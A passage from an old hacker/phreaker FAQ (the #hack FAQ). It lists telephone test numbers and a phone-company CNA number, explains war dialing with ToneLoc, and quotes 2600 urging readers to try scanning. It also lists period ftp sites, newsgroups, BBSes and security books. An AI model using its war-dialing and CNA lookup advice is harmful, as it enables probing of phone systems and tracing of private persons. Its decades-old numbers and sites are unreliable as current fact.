  1712. 313  569-9996  569-9996
  1713. 313  575-9996  575-9997
  1714. 313  577-9996  577-9997
  1715. 313  585-9996  585-9997
  1716. 313  591-9996  591-9997
  1717. 313  621-9996  621-9997
  1718. 313  626-9996  626-9997
  1719. 313  644-9996  644-9997
  1720. 313  646-9996  646-9997
  1721. 313  647-9996  647-9997
  1722. 313  649-9996  649-9997
  1723. 313  663-9996  663-9997
  1724. 313  665-9996  665-9997
  1725. 313  683-9996  683-9997
  1726. 313  721-9996  721-9997
  1727. 313  722-9996  722-9997
  1728. 313  728-9996  728-9997
  1729. 313  731-9996  731-9997
  1730. 313  751-9996  751-9997
  1731. 313  776-9996  776-9997
  1732. 313  781-9996  781-9997
  1733. 313  787-9996  787-9997
  1734. 313  822-9996  822-9997
  1735. 313  833-9996  833-9997
  1736. 313  851-9996  851-9997
  1737. 313  871-9996  871-9997
  1738. 313  875-9996  875-9997
  1739. 313  886-9996  886-9997
  1740. 313  888-9996  888-9997
  1741. 313  898-9996  898-9997
  1742. 313  934-9996  934-9997
  1743. 313  942-9996  942-9997
  1744. 313  963-9996  963-9997
  1745. 313  977-9996  977-9997
  1746. 313  995-9996  995-9997
  1747. 402  422-0001  422-0002
  1748. 402  422-0005  422-0006
  1749. 402  422-0007  422-0008
  1750. 402  422-0003  422-0004
  1751. 402  422-0005  422-0006
  1752. 402  422-0007  422-0008
  1753. 402  422-0009  ALL-PREF
  1754. 402  422-0003  422-0004
  1755. 402  422-0009  ALL-PREF
  1756. 402  422-0001  422-0002
  1757. 402  572-0003  572-0004
  1758. 517  422-9996  422-9997
  1759. 517  423-9996  423-9997
  1760. 517  455-9996  455-9997
  1761. 517  563-9996  563-9997
  1762. 517  663-9996  663-9997
  1763. 517  851-9996  851-9997
  1764. 609  921-9929  921-9930
  1765. 609  994-9929  994-9930
  1766. 616  997-9996  997-9997
  1767. 616  ALL-PREF  ALL-PREF
  1768. 713  224-1499  759-1799
  1769. 713  324-1499  324-1799
  1770. 713  342-1499  342-1799
  1771. 713  351-1499  351-1799
  1772. 713  354-1499  354-1799
  1773. 713  356-1499  356-1799
  1774. 713  442-1499  442-1799
  1775. 713  447-1499  447-1799
  1776. 713  455-1499  455-1799
  1777. 713  458-1499  458-1799
  1778. 713  462-1499  462-1799
  1779. 713  466-1499  466-1799
  1780. 713  468-1499  468-1799
  1781. 713  469-1499  469-1799
  1782. 713  471-1499  471-1799
  1783. 713  481-1499  481-1799
  1784. 713  482-1499  482-1799
  1785. 713  484-1499  484-1799
  1786. 713  487-1499  487-1799
  1787. 713  489-1499  489-1799
  1788. 713  492-1499  492-1799
  1789. 713  493-1499  493-1799
  1790. 713  524-1499  524-1799
  1791. 713  526-1499  526-1799
  1792. 713  555-1499  555-1799
  1793. 713  661-1499  661-1799
  1794. 713  664-1499  664-1799
  1795. 713  665-1499  665-1799
  1796. 713  666-1499  666-1799
  1797. 713  667-1499  667-1799
  1798. 713  682-1499  976-1799
  1799. 713  771-1499  771-1799
  1800. 713  780-1499  780-1799
  1801. 713  781-1499  997-1799
  1802. 713  960-1499  960-1799
  1803. 713  977-1499  977-1799
  1804. 713  988-1499  988-1799
  1805. 714  535-1118  535-1119
  1806. 714  538-1118  538-1119
  1807. 714  858-1118  858-1119
  1808. 714  879-1118  879-1119
  1809. 805  528-0044  528-0045
  1810. 805  544-0044  544-0045
  1811. 805  773-0044  773-0045
  1812. 813  385-9971
  1813. 908  776-9930  776-9930
  1814.  
  1815.  
  1816. 13. What is a CNA number?
  1817.  
  1818. CNA stands for Customer Name and Address.  The CNA number is a phone
  1819. number for telephone company personnel to call and get the name and
  1820. address for a phone number.  If a telephone lineman finds a phone line
  1821. he does not recognize, he can use the ANI number to find it's phone
  1822. number and then call the CNA operator to see who owns it and where
  1823. they live.
  1824.  
  1825. Normal CNA numbers are available only to telephone company personnel.
  1826. Private citizens may now legally get CNA information from private
  1827. companies.  Two such companies are:
  1828.  
  1829. Unidirectory    (900)933-3330
  1830. Telename        (900)884-1212
  1831.  
  1832. Note that these are 900 numbers, and will cost you approximately one
  1833. dollar per minute.
  1834.  
  1835.  
  1836. 14. What is the telephone company CNA number for my area?
  1837.  
  1838. 614  614-464-0123
  1839.  
  1840.  
  1841. 15. What is scanning?
  1842.  
  1843. Scanning is dialing a large number of telephone numbers in the hope
  1844. of finding interesting carriers (computers) or tones.
  1845.  
  1846. Scanning can be done by hand, although dialing several thousand
  1847. telephone numbers by hand is extremely boring and takes a long time.
  1848.  
  1849. Much better is to use a scanning program, sometimes called a war
  1850. dialer or a demon dialer.  Currently, the best war dialer available
  1851. to PC-DOS users is ToneLoc .99b8.
  1852.  
  1853. A war dialer will dial a range of numbers and log what it finds at
  1854. each number.  You can then only dial up the numbers that the war
  1855. dialer marked as carriers or tones.
  1856.  
  1857.  
  1858. 16. Is scanning illegal?
  1859.  
  1860. Excerpt from: 2600, Spring 1990, Page 27:
  1861.  
  1862. -BQ-
  1863. In some places, scanning has been made illegal.  It would be hard,
  1864. though, for someone to file a complaint against you for scanning since
  1865. the whole purpose is to call every number once and only once.  It's
  1866. not likely to be thought of as harassment by anyone who gets a single
  1867. phone call from a scanning computer.  Some central offices have been
  1868. known to react strangely when people start scanning.  Sometimes you're
  1869. unable to get a dialtone for hours after you start scanning.  But
  1870. there is no uniform policy.  The best thing to do is to first find out
  1871. if you've got some crazy law saying you can't do it.  If, as is
  1872. likely, there is no such law, the only way to find out what happens is
  1873. to give it a try.
  1874. -EQ-
  1875.  
  1876. It should be noted that a law making scanning illegal was recently
  1877. passed in Colorado Springs, CO.  It is now illegal to place a call
  1878. in Colorado Springs without the intent to communicate.
  1879.  
  1880.  
  1881.  
  1882. Section C: Resources
  1883. ~~~~~~~~~~~~~~~~~~~~
  1884.  
  1885.  
  1886. 01. What are some ftp sites of interest to hackers?
  1887.  
  1888. aql.gatech.edu
  1889. bellcore.com
  1890. cert.org
  1891. crimelab.com
  1892. cyberspace.com
  1893. deimos.cs.uah.edu
  1894. ftp.csua.berkeley.edu   /pub/cypherpunks
  1895. ftp.eff.org             /pub/cud
  1896. ftp.etext.org
  1897. ftp.mcs.com             /mcsnet.users/crisadm/stuff/research/samples
  1898. ftp.netcom.com          /pub/bradleym
  1899. ftp.netcom.com          /pub/zzyzx
  1900. ftp.std.com             /obi/Mischief/
  1901. ftp.std.com             /archives/alt.locksmithing
  1902. ftp.warwick.ac.uk
  1903. ftp.win.tue.nl
  1904. ftp.winternet.com       /users/craigb
  1905. garbo.uwasa.fi          /pc/crypt
  1906. ghost.dsi.unimi.it      /pub/crypt
  1907. grind.isca.uiwa.edu
  1908. hack-this.pc.cc.cmu.edu
  1909. halcyon.com
  1910. ideal.ios.net
  1911. lcs.mit.edu             /* Telecom archives */
  1912. mary.iia.org            /pub/users/patriot
  1913. nic.funet.fi            /pub/doc/cud
  1914. paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics/
  1915. ripem.msu.edu           /pub/crypt
  1916. rtfm.mit.edu
  1917. sekurity.com
  1918. spy.org
  1919. theta.iis.u-tokyo.ac.jp /pub1/security
  1920. vincent2.iastate.edu    login: anonymous.mabell /* Closed for the Summer */
  1921. wimsey.bc.ca            /pub/crypto
  1922.  
  1923. Here is the list again, this time in .netrc format:
  1924.  
  1925. machine  aql.gatech.edu
  1926. login    anonymous
  1927. password root@
  1928.  
  1929. machine  bellcore.com
  1930. login    anonymous
  1931. password root@
  1932.  
  1933. machine  cert.org
  1934. login    anonymous
  1935. password root@
  1936.  
  1937. machine  crimelab.com
  1938. login    anonymous
  1939. password root@
  1940.  
  1941. machine  cyberspace.com
  1942. login    anonymous
  1943. password root@
  1944.  
  1945. machine  deimos.cs.uah.edu
  1946. login    anonymous
  1947. password root@
  1948.  
  1949. machine  ftp.csua.berkeley.edu
  1950. login    anonymous
  1951. password root@
  1952.  
  1953. machine  ftp.eff.org
  1954. login    anonymous
  1955. password root@
  1956.  
  1957. machine  ftp.etext.org
  1958. login    anonymous
  1959. password root@
  1960.  
  1961. machine  ftp.mcs.com
  1962. login    anonymous
  1963. password root@
  1964.  
  1965. machine  ftp.netcom.com
  1966. login    anonymous
  1967. password root@
  1968.  
  1969. machine  ftp.netcom.com
  1970. login    anonymous
  1971. password root@
  1972.  
  1973. machine  ftp.std.com
  1974. login    anonymous
  1975. password root@
  1976.  
  1977. machine  ftp.std.com
  1978. login    anonymous
  1979. password root@
  1980.  
  1981. machine  ftp.warwick.ac.uk
  1982. login    anonymous
  1983. password root@
  1984.  
  1985. machine  ftp.win.tue.nl
  1986. login    anonymous
  1987. password root@
  1988.  
  1989. machine  ftp.winternet.com
  1990. login    anonymous
  1991. password root@
  1992.  
  1993. machine  garbo.uwasa.fi
  1994. login    anonymous
  1995. password root@
  1996.  
  1997. machine  ghost.dsi.unimi.it
  1998. login    anonymous
  1999. password root@
  2000.  
  2001. machine  grind.isca.uiwa.edu
  2002. login    anonymous
  2003. password root@
  2004.  
  2005. machine  hack-this.pc.cc.cmu.edu
  2006. login    anonymous
  2007. password root@
  2008.  
  2009. machine  halcyon.com
  2010. login    anonymous
  2011. password root@
  2012.  
  2013. machine  ideal.ios.net
  2014. login    anonymous
  2015. password root@
  2016.  
  2017. machine  lcs.mit.edu
  2018. login    anonymous
  2019. password root@
  2020.  
  2021. machine  mary.iia.org
  2022. login    anonymous
  2023. password root@
  2024.  
  2025. machine  nic.funet.fi
  2026. login    anonymous
  2027. password root@
  2028.  
  2029. machine  paradox1.denver.colorado.edu
  2030. login    anonymous
  2031. password root@
  2032.  
  2033. machine  ripem.msu.edu
  2034. login    anonymous
  2035. password root@
  2036.  
  2037. machine  rtfm.mit.edu
  2038. login    anonymous
  2039. password root@
  2040.  
  2041. machine  sekurity.com
  2042. login    anonymous
  2043. password root@
  2044.  
  2045. machine  spy.org
  2046. login    anonymous
  2047. password root@
  2048.  
  2049. machine  theta.iis.u-tokyo.ac.jp
  2050. login    anonymous
  2051. password root@
  2052.  
  2053. machine  vincent2.iastate.edu
  2054. login    anonymous
  2055. password mabell
  2056.  
  2057. machine  wimsey.bc.ca
  2058. login    anonymous
  2059. password root@
  2060.  
  2061.  
  2062. 02. What are some newsgroups of interest to hackers?
  2063.  
  2064. alt.2600
  2065. alt.cellular-phone-tech
  2066. alt.dcom.telecom
  2067. alt.hackers
  2068. alt.locksmithing
  2069. alt.sect.telcom
  2070. alt.security.index
  2071. alt.security.keydist
  2072. alt.security.pgp
  2073. alt.security.ripem
  2074. alt.security
  2075. comp.dcom.cellular
  2076. comp.dcom.telcom.tech
  2077. comp.dcom.telecom       Telecommunications digest. (Moderated)
  2078. comp.dcom.telecom.tech
  2079. comp.org.cpsr.announce
  2080. comp.org.cpsr.talk
  2081. comp.org.eff
  2082. comp.org.eff
  2083. comp.risks
  2084. comp.security.announce
  2085. comp.security.misc      Security issues of computers and networks.
  2086. comp.security.unix
  2087. comp.virus              Computer viruses & security. (Moderated)
  2088. misc.security           Security in general, not just computers. (Moderated)
  2089. rec.pyrotechnics
  2090. sci.crypt               Different methods of data en/decryption.
  2091.  
  2092.  
  2093. 03. What are some telnet sites of interest to hackers?
  2094.  
  2095. phred.pc.cc.cmu.edu
  2096.  
  2097.  
  2098. 04. What are some gopher sites of interest to hackers?
  2099.  
  2100. gopher@cpsr.org
  2101. gopher.eff.org
  2102. wiretap.spies.com
  2103.  
  2104.  
  2105. 05. What are some World wide Web (WWW) sites of interest to hackers?
  2106.  
  2107. http://crimelab.com//bugtraq/bugtraq/html
  2108. http://cs.purdue.edu/homes/spaf/coast.html
  2109. http://cs.purdue.edu/homes/spaf/pcert.html
  2110. http://first.org
  2111. http://l0pht.com
  2112. http://tamsun.tamu.edu/~clm3840/hacking.html/
  2113. http://www.cpsr.org/home
  2114. http://www.iia.org/~gautier/me.html
  2115. http://www.engin.umich.edu/~jgotts/underground.html
  2116. http://www.net23.com
  2117. http: /www.paranoia.com /defcon
  2118. http://www.phantom.com/~king
  2119. http://www.spy.org /Security/Local/News
  2120.  
  2121.  
  2122. 06. What are some IRC channels of interest to hackers?
  2123.  
  2124. #2600
  2125. #hack
  2126. #phreak
  2127. #linux
  2128. #root
  2129. #unix
  2130. #warez
  2131.  
  2132.  
  2133. 07. What are some BBS's of interest to hackers?
  2134.  
  2135. Home BBS                (303)343-4053
  2136. fARM R0Ad 666           (713)855-0261
  2137. Corrupt Sekurity        (303)753-1719
  2138.  
  2139.  
  2140. 08. What books are available on this subject?
  2141.  
  2142.  
  2143. General Computer Security
  2144. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2145. Computer Security Basics
  2146. Author: Deborah Russell and G.T. Gengemi Sr.
  2147. Publisher: O'Reilly & Associates, Inc.
  2148. Copyright Date: 1991
  2149. ISBN: 0-937175-71-4
  2150.  
  2151.         This is an excellent book.  It gives a broad overview of
  2152.         computer security without sacrificing detail.  A must read for
  2153.         the beginning security expert.
  2154.  
  2155. Computer Security Management
  2156. Author: Karen Forcht
  2157. Publisher: Boyd and Fraser
  2158. Copyright Date: 1994
  2159. ISBN: 0-87835-881-1
  2160.  
  2161. Information Systems Security
  2162. Author: Philip Fites and Martin Kratz
  2163. Publisher: Van Nostrad Reinhold
  2164. Copyright Date: 1993
  2165. ISBN: 0-442-00180-0
  2166.  
  2167.  
  2168. Unix System Security
  2169. ~~~~~~~~~~~~~~~~~~~~
  2170. Practical Unix Security
  2171. Author: Simson Garfinkel and Gene Spafford
  2172. Publisher: O'Reilly & Associates, Inc.
  2173. Copyright Date: 1991
  2174. ISBN: 0-937175-72-2
  2175.  
  2176.         Finally someone with a very firm grasp of Unix system security
  2177.         gets down to writing a book on the subject.  Buy this book.
  2178.         Read this book.
  2179.  
  2180. Firewalls and Internet Security
  2181. Author: William Cheswick and Steven Bellovin
  2182. Publisher: Addison Wesley
  2183. Copyright Date: 1994
  2184. ISBN: 0-201-63357-4
  2185.  
  2186. Unix System Security
  2187. Author: Rik Farrow
  2188. Publisher: Addison Wesley
  2189. Copyright Date: 1991
  2190. ISBN: 0-201-57030-0
  2191.  
  2192. Unix Security: A Practical Tutorial
  2193. Author: N. Derek Arnold
  2194. Publisher: McGraw Hill
  2195. Copyright Date: 1993
  2196. ISBN: 0-07-002560-6
  2197.  
  2198. Unix System Security: A Guide for Users and Systems Adiministrators
  2199. Author: David A. Curry
  2200. Publisher: Addison-Wesley
  2201. Copyright Date: 1992
  2202. ISBN: 0-201-56327-4
  2203.  
  2204. Unix System Security
  2205. Author: Patrick H. Wood and Stephen G. Kochan
  2206. Publisher: Hayden Books
  2207. Copyright Date: 1985
  2208. ISBN: 0-672-48494-3
  2209.  
  2210.  
  2211. Network Security
  2212. ~~~~~~~~~~~~~~~~
  2213. Network Security Secrets
  2214. Author: David J. Stang and Sylvia Moon
  2215. Publisher: IDG Books
  2216. Copyright Date: 1993
  2217. ISBN: 1-56884-021-7
  2218.  
  2219.         Not a total waste of paper, but definitely not worth the
  2220.         $49.95 purchase price.  The book is a rehash of previously
  2221.         published information.  The only secret we learn from reading
  2222.         the book is that Sylvia Moon is a younger woman madly in love
  2223.         with the older David Stang.
  2224.  
  2225. Complete Lan Security and Control
  2226. Author: Peter Davis
  2227. Publisher: Windcrest / McGraw Hill
  2228. Copyright Date: 1994
  2229. ISBN: 0-8306-4548-9 and 0-8306-4549-7
  2230.  
  2231. Network Security
  2232. Author: Steven Shaffer and Alan Simon
  2233. Publisher: AP Professional
  2234. Copyright Date: 1994
  2235. ISBN: 0-12-638010-4
  2236.  
  2237.  
  2238. Cryptography
  2239. ~~~~~~~~~~~~
  2240. Applied Cryptography: Protocols, Algorithms, and Source Code in C
  2241. Author: Bruce Schneier
  2242. Publisher: John Wiley & Sons
  2243. Copyright Date: 1994
  2244. ISBN: 0-471-59756-2
  2245.  
  2246.         Bruce Schneier's book replaces all other texts on
  2247.         cryptography.  If you are interested in cryptography, this is
  2248.         a must read.  This may be the first and last book on
  2249.         cryptography you may ever need to buy.
  2250.  
  2251. Cryptography and Data Security
  2252. Author: Dorothy Denning
  2253. Publisher: Addison-Wesley Publishing Co.
  2254. Copyright Date: 1982
  2255. ISBN: 0-201-10150-5
  2256.  
  2257. Programmed Threats
  2258. ~~~~~~~~~~~~~~~~~~
  2259. The Little Black Book of Computer Viruses
  2260. Author: Mark Ludwig
  2261. Publisher: American Eagle Publications
  2262. Copyright Date: 1990
  2263. ISBN: 0-929408-02-0
  2264.  
  2265.         The original, and still the best, book on computer viruses.
  2266.         No media hype here, just good clean technical information.
  2267.  
  2268. Computer Viruses, Artificial Life and Evolution
  2269. Author: Mark Ludwig
  2270. Publisher: American Eagle Publications
  2271. Copyright Date: 1993
  2272. ISBN: 0-929408-07-1
  2273.  
  2274. Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  2275.         Threats to Your System
  2276. Author: John McAfee and Colin Haynes
  2277. Publisher: St. Martin's Press
  2278. Copyright Date: 1989
  2279. ISBN: 0-312-03064-9 and 0-312-02889-X
  2280.  
  2281.  
  2282. Hacking History and Culture
  2283. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2284. The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  2285. Author: Bruce Sterling
  2286. Publisher: Bantam Books
  2287. Copyright Date: 1982
  2288. ISBN: 0-553-56370-X
  2289.  
  2290.         Bruce Sterling has recently released the book FREE to the net.
  2291.         The book is much easier to read in print form, and the
  2292.         paperback is only $5.99.  Either way you read it, you will be
  2293.         glad you did.  Mr. Sterling is an excellent science fiction
  2294.         author and has brought his talent with words to bear on the
  2295.         hacking culture.  A very enjoyable reading experience.
  2296.  
  2297. Cyberpunk
  2298. Author: Katie Hafner and John Markoff
  2299. Publisher: Simon and Schuster
  2300. Copyright Date: 1991
  2301. ISBN: 0-671-77879-X
  2302.  
  2303. The Cuckoo's Egg
  2304. Author: Cliff Stoll
  2305. Publisher: Simon and Schuster
  2306. Copyright Date: 1989
  2307. ISBN: 0-671-72688-9
  2308.  
  2309. Hackers: Heroes of the Computer Revolution
  2310. Author: Steven Levy
  2311. Publisher: Doubleday
  2312. Copyright Date: 1984
  2313. ISBN: 0-440-13495-6
  2314.  
  2315.  
  2316. Unclassified
  2317. ~~~~~~~~~~~~
  2318. Secrets of a Super Hacker
  2319. Author: The Knightmare
  2320. Publisher: Loompanics
  2321. Copyright Date: 1994
  2322. ISBN: 1-55950-106-5
  2323.  
  2324.         The Knightmare is no super hacker.  There is little or no real
  2325.         information in this book.  The Knightmare gives useful advice
  2326.         like telling you not to dress up before going trashing.
  2327.         The Knightmare's best hack is fooling Loompanics into
  2328.         publishing this garbage.
  2329.  
  2330. The Day The Phones Stopped
  2331. Author: Leonard Lee
  2332. Publisher: Primus / Donald I Fine, Inc.
  2333. Copyright Date: 1992
  2334. ISBN: 1-55611-286-6
  2335.  
  2336.         Total garbage.  Paranoid delusions of a lunatic.  Less factual
  2337.         data that an average issue of the Enquirer.
  2338.  
  2339. Information Warfare
  2340. Author: Winn Swartau
  2341. Publisher: Thunder Mountain Press
  2342. Copyright Date: 1994
  2343. ISBN: 1-56025-080-1
  2344.  
  2345.  
  2346. 09. What are some mailing lists of interest to hackers?
  2347.  
  2348. Name:        Cert Tools
  2349. Address:     cert-tools@cert.org
  2350. To register: cert-tools-request@cert.org
  2351.  
  2352. Name:        rfc931-users
  2353. Address:     rfc931-users@kramden.acf.nyu.edu
  2354. To register: brnstnd@nyu.edu
  2355.  
  2356. Name:        Computers and Society
  2357. Address:     Comp-Soc@limbo.intuitive.com
  2358. To register: taylor@limbo.intuitive.com
  2359.  
  2360. Name:        CPSR Announcement List
  2361. Address:     cpsr-announce@cpsr.org
  2362. To register:
  2363.  
  2364. Name:        Intellectual Property
  2365. Address:     cpsr-int-prop@cpsr.org
  2366. To register:
  2367.  
  2368. Name:        CPSR Internet Library
  2369. Address:     cpsr-library@cpsr.org
  2370. To register:
  2371.  
  2372. Name:        Coordinated Feasibility Effort to Unravel State Data
  2373. Address:     ldc-sw@cpsr.org
  2374. To register:
  2375.  
  2376. Name:        Macintosh Security
  2377. Address:     mac-security@eclectic.com
  2378. To register: mac-security-request@eclectic.com
  2379.  
  2380. Name:        NeXT Managers
  2381. Address:
  2382. To register: next-managers-request@stolaf.edu
  2383.  
  2384. Name:        RSA Users
  2385. Address:     rsaref-users@rsa.com
  2386. To register: rsaref-users-request@rsa.com
  2387.  
  2388. Name:        Security
  2389. Address:     security@aim.rutgers.edu
  2390. To register: security-request@aim.rutgers.edu
  2391.  
  2392.  
  2393. Section D: Miscellaneous
  2394. ~~~~~~~~~~~~~~~~~~~~~~~~
  2395.  
  2396. 01. What does XXX stand for?
  2397.  
  2398. TLA Three Letter Acronym
  2399.  
  2400. ACL     Access Control List
  2401. PIN     Personal Identification Number
  2402. TCB     Trusted Computing Base
  2403.  
  2404. ALRU    Automatic Line Record Update
  2405. AN      Associated Number
  2406. ARSB    Automated Repair Service Bureau
  2407. ATH     Abbreviated Trouble History
  2408. BOC     Bell Operating Company
  2409. BOR     Basic Output Report
  2410. CA      Cable
  2411. COE     Central Office Equipment
  2412. CMC     Construction Maintenance Center
  2413. CNID    Calling Number IDentification
  2414. CO      Central Office
  2415. COCOT   Customer Owned Coin Operated Telephone
  2416. CRSAB   Centralized Repair Service Answering Bureau
  2417. DDD     Direct Distance Dialing
  2418. ECC     Enter Cable Change
  2419. LD      Long Distance
  2420. LMOS    Loop Maintenance Operations System
  2421. MLT     Mechanized Loop Testing
  2422. NPA     Numbering Plan Area
  2423. POTS    Plain Old Telephone Service
  2424. RBOC    Regional Bell Operating Company
  2425. RSB     Repair Service Bureau
  2426. SS      Special Service
  2427. TAS     Telephone Answering Service
  2428. TH      Trouble History
  2429. TREAT   Trouble Report Evaluation and Analysis Tool
  2430.  
  2431. NTA     The Nocturnal Trading Alliance
  2432. PE      Public Enemy
  2433. TDT     The Dream Team
  2434. THG     The Humble Guys
  2435. THP     The Hill People
  2436.  
  2437.  
  2438. 02. Where can I get a copy of the #hack FAQ?
  2439.  
  2440. Finger will@gnu.ai.mit.edu for the latest release of the #hack FAQ.
  2441.  
  2442.  
  2443. EOT
  2444. -- 
  2445. \* Will Spencer        : The advancement and diffusion of knowledge *\
  2446. \* Unix geek           : is the only guardian of true liberty.      *\
  2447. \* PC guru             :               --  James Madison            *\
  2448. \* Revolutionary       :               4th U.S. President           *\
  2449.  
  2450.  
  2451.